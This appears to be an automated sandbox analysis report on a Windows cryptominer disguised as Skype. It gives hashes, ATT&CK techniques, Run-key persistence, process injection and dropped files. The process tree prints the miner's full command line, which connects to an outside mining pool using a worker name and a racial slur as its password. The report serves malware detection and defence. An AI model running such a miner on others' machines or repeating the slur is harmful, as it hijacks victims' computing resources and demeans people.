2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

Analysis

max time kernel
136s
max time network
47s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
24-11-2022 05:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
Size

1.3MB
MD5

a1bda40c59fd27a982da6e38712d0f0a
SHA1

8b67c4ae2806d9a68a4471687bb05e69a639340a
SHA256

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2
SHA512

6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f
SSDEEP

24576:116ATdlcMtqmaK5T4ddwIetMYVYzgKSzu8eYIIhGlAxhiYtoXFitA4oQu4omQ0:116AplhtZR5CwIjYMzSzu8eYI8GlAxhN

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

Skype.exeSkype.exe

pid process

1364 Skype.exe
988 Skype.exe

pid	process
1364	Skype.exe
988	Skype.exe

Loads dropped DLL 9 IoCs

Processes:

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exeSkype.exeSkype.exe

pid	process
2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
1364	Skype.exe
1364	Skype.exe
988	Skype.exe
988	Skype.exe
988	Skype.exe
988	Skype.exe
988	Skype.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\161b9eade53b463fa33342ac11a6f559 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Skype\\Skype.exe"	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Skype.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Skype.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Skype.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exeSkype.exe

description	pid	process
Token: SeDebugPrivilege	2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
Token: SeDebugPrivilege	1364	Skype.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exeSkype.exe

description	pid	process	target process
PID 2000 wrote to memory of 1364	2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe	Skype.exe
PID 2000 wrote to memory of 1364	2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe	Skype.exe
PID 2000 wrote to memory of 1364	2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe	Skype.exe
PID 2000 wrote to memory of 1364	2000	2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe	Skype.exe
PID 1364 wrote to memory of 988	1364	Skype.exe	Skype.exe
PID 1364 wrote to memory of 988	1364	Skype.exe	Skype.exe
PID 1364 wrote to memory of 988	1364	Skype.exe	Skype.exe
PID 1364 wrote to memory of 988	1364	Skype.exe	Skype.exe

C:\Users\Admin\AppData\Local\Temp\2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
"C:\Users\Admin\AppData\Local\Temp\2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000

C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
"C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364

C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\Skype.exe
"C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\Skype.exe" -a scrypt -o stratum+tcp://pool.omnicoin.cc:3333 -u jlyon11.slave -p nigger -g no
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
Filesize
1.3MB

MD5
a1bda40c59fd27a982da6e38712d0f0a

SHA1
8b67c4ae2806d9a68a4471687bb05e69a639340a

SHA256
2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

SHA512
6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
Filesize
1.3MB

MD5
a1bda40c59fd27a982da6e38712d0f0a

SHA1
8b67c4ae2806d9a68a4471687bb05e69a639340a

SHA256
2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

SHA512
6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\MPIR.dll
Filesize
133KB

MD5
53bfc187ad3cd270b626d10917173d56

SHA1
12fafe1f0224b54a8a2283584048698841190d20

SHA256
6b7eb4a0a7f30ab2df9c08f5db2706edbbd2f3eff7abe77d4e76930748f7d790

SHA512
168f5f400d81cb836f810c2f95ebd24c4397e72517a7d1b19b96153856d79e2cdb75dd9b8fc90d6d5c38fe469c9c3882ca6197932237a1520f8f12bc7d161f71

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\OPENSSL.dll
Filesize
844KB

MD5
30d5168e299c6490a4592bddb4e3b983

SHA1
db7432b9a4501bd05067df6dc2c4ed3e459b3103

SHA256
10d43210c5f58c369a8468b1075a73540afb888f318bd6cba3a8811bba70e502

SHA512
b7581635f604d0ee50eb2daabc40483f98fd5d1fcbf503f230992afe8f03a61b5b5ea399e23c247c4ff080092f2c198d425ce9bb094168d69fe25765a31fe88e

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\Skype.exe
Filesize
55KB

MD5
7089c7116ae411f342f08026e00b2cdc

SHA1
b928561537447cfc297083e08cded6ad9b4a0400

SHA256
101de8576981939409e1ba49cd80b9d5e45a4645a0558d3b03bef0b7189e48c6

SHA512
651af14aa287d463f95763ddfc7c30b8b3ebd26d1bfef866f09d6df5d194d46520979112f19b7996aeb5436153deae5e3cd154c87f2ec8ae5c04ce0fe74dcdfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\coinutil.dll
Filesize
48KB

MD5
e63ed0d8d419e4722c7b9334c41cae35

SHA1
8dcbee30026b208b1bc07f49a3a6849fdd6d0f61

SHA256
93b4df8ba9b1fc75c535395383bcafc84df83989a94e4b606af6527d21a051c8

SHA512
90318e8fc98635123f58c11bbd0775f140ef3104e23c9f41bf6c7b9387692851e5d61ba20f2c13e91d640a633df9bdae2fd8847097d258f5ec1ffaee61533e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\miner.dll
Filesize
459KB

MD5
5015bd0c4a85822c912f9c252088f9b5

SHA1
3697de028448e874fcd02fb3ed30a6fdb376c56b

SHA256
14dea6ff9271ec5f4ac3dda59f6ccc69e12f8fbd1d0ded922971ba751a882d13

SHA512
caaee8fd9f121cbb0465e78f377a462720bbfce73dd2398c6881461c5a99f1a5bb4a16aefe582192f24ccb1f8823f5b271d45012e43ebf7f06158462c3cadb47

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\usft_ext.dll
Filesize
664KB

MD5
6c3491eb039af3b749bbae91f80dca4b

SHA1
ef2e6cb72d0004cce10fbb12bc1ec6878d1582e0

SHA256
f80a6d72a0b4445f17ec8c10268397ca961db946b9aeec5ba3a3b2ac87512b75

SHA512
1331b3d548aec11e19b6b452545bd1827aa28b46d383851422d32cb4dc6dce2ee1e9ec5436be10850f08f7f918f3c4ec8f39a16b44084f90ad152e0e337b5c7f

Download Submit
\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
Filesize
1.3MB

MD5
a1bda40c59fd27a982da6e38712d0f0a

SHA1
8b67c4ae2806d9a68a4471687bb05e69a639340a

SHA256
2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

SHA512
6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

Download Submit
\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
Filesize
1.3MB

MD5
a1bda40c59fd27a982da6e38712d0f0a

SHA1
8b67c4ae2806d9a68a4471687bb05e69a639340a

SHA256
2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

SHA512
6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\Skype.exe
Filesize
55KB

MD5
7089c7116ae411f342f08026e00b2cdc

SHA1
b928561537447cfc297083e08cded6ad9b4a0400

SHA256
101de8576981939409e1ba49cd80b9d5e45a4645a0558d3b03bef0b7189e48c6

SHA512
651af14aa287d463f95763ddfc7c30b8b3ebd26d1bfef866f09d6df5d194d46520979112f19b7996aeb5436153deae5e3cd154c87f2ec8ae5c04ce0fe74dcdfc

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\Skype.exe
Filesize
55KB

MD5
7089c7116ae411f342f08026e00b2cdc

SHA1
b928561537447cfc297083e08cded6ad9b4a0400

SHA256
101de8576981939409e1ba49cd80b9d5e45a4645a0558d3b03bef0b7189e48c6

SHA512
651af14aa287d463f95763ddfc7c30b8b3ebd26d1bfef866f09d6df5d194d46520979112f19b7996aeb5436153deae5e3cd154c87f2ec8ae5c04ce0fe74dcdfc

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\coinutil.dll
Filesize
48KB

MD5
e63ed0d8d419e4722c7b9334c41cae35

SHA1
8dcbee30026b208b1bc07f49a3a6849fdd6d0f61

SHA256
93b4df8ba9b1fc75c535395383bcafc84df83989a94e4b606af6527d21a051c8

SHA512
90318e8fc98635123f58c11bbd0775f140ef3104e23c9f41bf6c7b9387692851e5d61ba20f2c13e91d640a633df9bdae2fd8847097d258f5ec1ffaee61533e56

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\miner.dll
Filesize
459KB

MD5
5015bd0c4a85822c912f9c252088f9b5

SHA1
3697de028448e874fcd02fb3ed30a6fdb376c56b

SHA256
14dea6ff9271ec5f4ac3dda59f6ccc69e12f8fbd1d0ded922971ba751a882d13

SHA512
caaee8fd9f121cbb0465e78f377a462720bbfce73dd2398c6881461c5a99f1a5bb4a16aefe582192f24ccb1f8823f5b271d45012e43ebf7f06158462c3cadb47

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\mpir.dll
Filesize
133KB

MD5
53bfc187ad3cd270b626d10917173d56

SHA1
12fafe1f0224b54a8a2283584048698841190d20

SHA256
6b7eb4a0a7f30ab2df9c08f5db2706edbbd2f3eff7abe77d4e76930748f7d790

SHA512
168f5f400d81cb836f810c2f95ebd24c4397e72517a7d1b19b96153856d79e2cdb75dd9b8fc90d6d5c38fe469c9c3882ca6197932237a1520f8f12bc7d161f71

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\openssl.dll
Filesize
844KB

MD5
30d5168e299c6490a4592bddb4e3b983

SHA1
db7432b9a4501bd05067df6dc2c4ed3e459b3103

SHA256
10d43210c5f58c369a8468b1075a73540afb888f318bd6cba3a8811bba70e502

SHA512
b7581635f604d0ee50eb2daabc40483f98fd5d1fcbf503f230992afe8f03a61b5b5ea399e23c247c4ff080092f2c198d425ce9bb094168d69fe25765a31fe88e

Download Submit
\Users\Admin\AppData\Local\Temp\b2ef0e4ba70949138ec9eebe1c7e4849\usft_ext.dll
Filesize
664KB

MD5
6c3491eb039af3b749bbae91f80dca4b

SHA1
ef2e6cb72d0004cce10fbb12bc1ec6878d1582e0

SHA256
f80a6d72a0b4445f17ec8c10268397ca961db946b9aeec5ba3a3b2ac87512b75

SHA512
1331b3d548aec11e19b6b452545bd1827aa28b46d383851422d32cb4dc6dce2ee1e9ec5436be10850f08f7f918f3c4ec8f39a16b44084f90ad152e0e337b5c7f

Download Submit
memory/988-64-0x0000000000000000-mapping.dmp

Download
memory/1364-71-0x0000000075030000-0x00000000755DB000-memory.dmp

Filesize
5.7MB

Download
memory/1364-57-0x0000000000000000-mapping.dmp

Download
memory/2000-54-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

Filesize
8KB

Download
memory/2000-61-0x0000000075040000-0x00000000755EB000-memory.dmp

Filesize
5.7MB

Download